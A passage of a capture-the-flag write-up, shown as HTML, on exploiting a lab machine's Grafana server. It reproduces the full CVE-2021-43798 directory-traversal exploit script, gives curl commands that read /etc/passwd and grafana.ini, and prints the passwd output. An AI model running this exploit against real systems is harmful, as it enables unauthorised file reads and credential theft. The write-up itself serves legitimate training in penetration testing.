&lt;img src="https://h4r1337.github.io/img/ambassador/Pasted%20image%2020230130145523.webp" alt="">&lt;p>Port 80 is running on &lt;code>hugo&lt;/code>, a static site generator. So we can&amp;rsquo;t find much in there except this post.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/ambassador/Pasted%20image%2020230130150352.webp" alt="">&lt;p>maybe a hint or something&amp;hellip;&lt;/p>
&lt;h2 id="port-3000---http-grafana">Port 3000 - HTTP (Grafana)&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/ambassador/Pasted%20image%2020230131173053.webp" alt="">&lt;p>It is a &lt;code>grafana&lt;/code> login page. And we can see the version in the bottom. We can use &lt;code>searchsploit&lt;/code> to check whether the grafana version is vulnerable or not.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-fallback" data-lang="fallback">&lt;span style="display:flex;">&lt;span> searchsploit grafana
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>------------------------------------------------------------- ---------------------------------
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> Exploit Title | Path
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>------------------------------------------------------------- ---------------------------------
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Grafana 7.0.1 - Denial of Service (PoC) | linux/dos/48638.sh
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Grafana 8.3.0 - Directory Traversal and Arbitrary File Read | multiple/webapps/50581.py
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>------------------------------------------------------------- ---------------------------------
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Shellcodes: No Results
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>And there&amp;rsquo;s an exploit for Grafana version &lt;code>8.3.0&lt;/code> and below ( &lt;strong>&lt;code>CVE-2021-43798&lt;/code>&lt;/strong> ) . Let&amp;rsquo;s copy that to the current directory using the &lt;code>-m&lt;/code> flag.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-fallback" data-lang="fallback">&lt;span style="display:flex;">&lt;span> searchsploit -m 50581
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;hr>
&lt;h1 id="exploitation">Exploitation&lt;/h1>
&lt;h2 id="directory-traversal">Directory Traversal&lt;/h2>
&lt;blockquote>
&lt;p>Grafana versions 8.0.0-beta1 through 8.3.0 is vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: &amp;lt;grafana_host_url&amp;gt;/public/plugins//, where is the plugin ID for any installed plugin.&lt;/p>
&lt;/blockquote>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-python" data-lang="python">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Exploit Title: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Date: 08/12/2021&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Exploit Author: s1gh&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Vendor Homepage: https://grafana.com/&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Version: V8.0.0-beta1 through V8.3.0&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Description: Grafana versions 8.0.0-beta1 through 8.3.0 is vulnerable to directory traversal, allowing access to local files.&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># CVE: CVE-2021-43798&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Tested on: Debian 10&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># References: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p47p&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic">#!/usr/bin/env python3&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># -*- coding: utf-8 -*-&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> requests
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> argparse
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> sys
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">from&lt;/span> random &lt;span style="color:#fe8019">import&lt;/span> choice
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>plugin_list &lt;span style="color:#fe8019">=&lt;/span> [
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;alertlist&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;annolist&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;barchart&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;bargauge&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;candlestick&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;cloudwatch&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;dashlist&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;elasticsearch&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;gauge&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;geomap&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;gettingstarted&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;grafana-azure-monitor-datasource&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;graph&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;heatmap&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;histogram&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;influxdb&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;jaeger&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;logs&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;loki&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;mssql&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;mysql&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;news&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;nodeGraph&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;opentsdb&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;piechart&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;pluginlist&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;postgres&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;prometheus&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;stackdriver&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;stat&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;state-timeline&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;status-histor&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;table&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;table-old&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;tempo&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;testdata&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;text&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;timeseries&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;welcome&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;zipkin&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>]
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">exploit&lt;/span>(args):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> s &lt;span style="color:#fe8019">=&lt;/span> requests&lt;span style="color:#fe8019">.&lt;/span>Session()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> headers &lt;span style="color:#fe8019">=&lt;/span> { &lt;span style="color:#b8bb26">&amp;#39;User-Agent&amp;#39;&lt;/span>: &lt;span style="color:#b8bb26">&amp;#39;Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.&amp;#39;&lt;/span> }
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">while&lt;/span> &lt;span style="color:#fe8019">True&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> file_to_read &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#fabd2f">input&lt;/span>(&lt;span style="color:#b8bb26">&amp;#39;Read file &amp;gt; &amp;#39;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">try&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> url &lt;span style="color:#fe8019">=&lt;/span> args&lt;span style="color:#fe8019">.&lt;/span>host &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;/public/plugins/&amp;#39;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> choice(plugin_list) &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;/../../../../../../../../../../../../..&amp;#39;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> file_to_read
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> req &lt;span style="color:#fe8019">=&lt;/span> requests&lt;span style="color:#fe8019">.&lt;/span>Request(method&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;GET&amp;#39;&lt;/span>, url&lt;span style="color:#fe8019">=&lt;/span>url, headers&lt;span style="color:#fe8019">=&lt;/span>headers)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> prep &lt;span style="color:#fe8019">=&lt;/span> req&lt;span style="color:#fe8019">.&lt;/span>prepare()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> prep&lt;span style="color:#fe8019">.&lt;/span>url &lt;span style="color:#fe8019">=&lt;/span> url
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> r &lt;span style="color:#fe8019">=&lt;/span> s&lt;span style="color:#fe8019">.&lt;/span>send(prep, verify&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#fe8019">False&lt;/span>, timeout&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">3&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;Plugin file not found&amp;#39;&lt;/span> &lt;span style="color:#fe8019">in&lt;/span> r&lt;span style="color:#fe8019">.&lt;/span>text:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">print&lt;/span>(&lt;span style="color:#b8bb26">&amp;#39;[-] File not found&lt;/span>&lt;span style="color:#b8bb26">\n&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">else&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> r&lt;span style="color:#fe8019">.&lt;/span>status_code &lt;span style="color:#fe8019">==&lt;/span> &lt;span style="color:#d3869b">200&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">print&lt;/span>(r&lt;span style="color:#fe8019">.&lt;/span>text)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">else&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">print&lt;/span>(&lt;span style="color:#b8bb26">&amp;#39;[-] Something went wrong.&amp;#39;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">except&lt;/span> requests&lt;span style="color:#fe8019">.&lt;/span>exceptions&lt;span style="color:#fe8019">.&lt;/span>ConnectTimeout:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">print&lt;/span>(&lt;span style="color:#b8bb26">&amp;#39;[-] Request timed out. Please check your host settings.&lt;/span>&lt;span style="color:#b8bb26">\n&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">except&lt;/span> &lt;span style="color:#fb4934">Exception&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">pass&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">main&lt;/span>():
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> parser &lt;span style="color:#fe8019">=&lt;/span> argparse&lt;span style="color:#fe8019">.&lt;/span>ArgumentParser(description&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;Grafana V8.0.0-beta1 - 8.3.0 - Directory Traversal and Arbitrary File Read&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> parser&lt;span style="color:#fe8019">.&lt;/span>add_argument(&lt;span style="color:#b8bb26">&amp;#39;-H&amp;#39;&lt;/span>,dest&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;host&amp;#39;&lt;/span>,required&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#fe8019">True&lt;/span>, help&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;Target host&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> args &lt;span style="color:#fe8019">=&lt;/span> parser&lt;span style="color:#fe8019">.&lt;/span>parse_args()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">try&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> exploit(args)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">except&lt;/span> &lt;span style="color:#fb4934">KeyboardInterrupt&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> __name__ &lt;span style="color:#fe8019">==&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;__main__&amp;#39;&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> main()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> sys&lt;span style="color:#fe8019">.&lt;/span>exit(&lt;span style="color:#d3869b">0&lt;/span>)
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>As we can see, the above script is trying to exploit a directory traversel. The script is first accessing &lt;code>/public/plugins&lt;/code> directory and then trying to access a plugin from the list &lt;code>plugin_list&lt;/code> followed by the path. We can try this in curl:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span> curl --path-as-is &lt;span style="color:#b8bb26">&amp;#34;http://10.10.11.183:3000/public/plugins/testplugin/../../../../../../../../etc/passwd&amp;#34;&lt;/span> -ik
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>HTTP/1.1 &lt;span style="color:#d3869b">404&lt;/span> Not Found
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Cache-Control: no-cache
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Content-Type: application/json; charset&lt;span style="color:#fe8019">=&lt;/span>UTF-8
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Expires: -1
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Pragma: no-cache
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>X-Content-Type-Options: nosniff
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>X-Frame-Options: deny
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>X-Xss-Protection: 1; mode&lt;span style="color:#fe8019">=&lt;/span>block
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Date: Tue, &lt;span style="color:#d3869b">31&lt;/span> Jan &lt;span style="color:#d3869b">2023&lt;/span> 12:23:47 GMT
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Content-Length: &lt;span style="color:#d3869b">31&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">{&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;message&amp;#34;&lt;/span>:&lt;span style="color:#b8bb26">&amp;#34;Plugin not found&amp;#34;&lt;/span>&lt;span style="color:#fe8019">}&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>If we enter a plugin that is not from the &lt;code>plugin_list&lt;/code> then the server returns a 404 error with &lt;code>{&amp;quot;message&amp;quot;:&amp;quot;Plugin not found&amp;quot;}&lt;/code>. If we use a valid plugin then the exploit works:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span> curl --path-as-is &lt;span style="color:#b8bb26">&amp;#34;http://10.10.11.183:3000/public/plugins/alertlist/../../../../../../../../etc/passwd&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>root:x:0:0:root:/root:/bin/bash
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>bin:x:2:2:bin:/bin:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>sys:x:3:3:sys:/dev:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>sync:x:4:65534:sync:/bin:/bin/sync
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>games:x:5:60:games:/usr/games:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>gnats:x:41:41:Gnats Bug-Reporting System &lt;span style="color:#fe8019">(&lt;/span>admin&lt;span style="color:#fe8019">)&lt;/span>:/var/lib/gnats:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>syslog:x:104:110::/home/syslog:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>pollinate:x:110:1::/var/cache/pollinate:/bin/false
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>developer:x:1000:1000:developer:/home/developer:/bin/bash
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>grafana:x:113:118::/usr/share/grafana:/bin/false
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>consul:x:997:997::/home/consul:/bin/false
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;br>
&lt;blockquote>
&lt;p>&lt;strong>Remember to add the &lt;code>--path-as-is&lt;/code> flag while using &lt;code>curl&lt;/code>&lt;/strong>&lt;/p>
&lt;/blockquote>
&lt;p>Now we have to check for some default config file or database locations used in grafana in order to get the flag. While searching for it I found this &lt;a href="https://github.com/pedrohavay/exploit-grafana-CVE-2021-43798">github exploit&lt;/a> and there is a &lt;a href="https://github.com/pedrohavay/exploit-grafana-CVE-2021-43798/blob/main/paths.txt">paths.txt&lt;/a> with all the default locations of config and db files. So let&amp;rsquo;s use that:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-fallback" data-lang="fallback">&lt;span style="display:flex;">&lt;span> curl --path-as-is &amp;#34;http://10.10.11.183:3000/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/grafana/grafana.ini&amp;#34; &amp;gt; grafana.ini
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;code>/etc/grafana/grafana.ini&lt;/code> is a config file. Notice that in this file everything except the &lt;code>admin_password&lt;/code> is commented out:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/ambassador/Pasted%20image%2020230131181723.webp" alt="">&lt;p>We can try logging in to the grafana admin panel using the password. But there isn&amp;rsquo;t much we can do in there. So let&amp;rsquo;s get the &lt;code>grafana.db&lt;/code> file.&lt;/p>
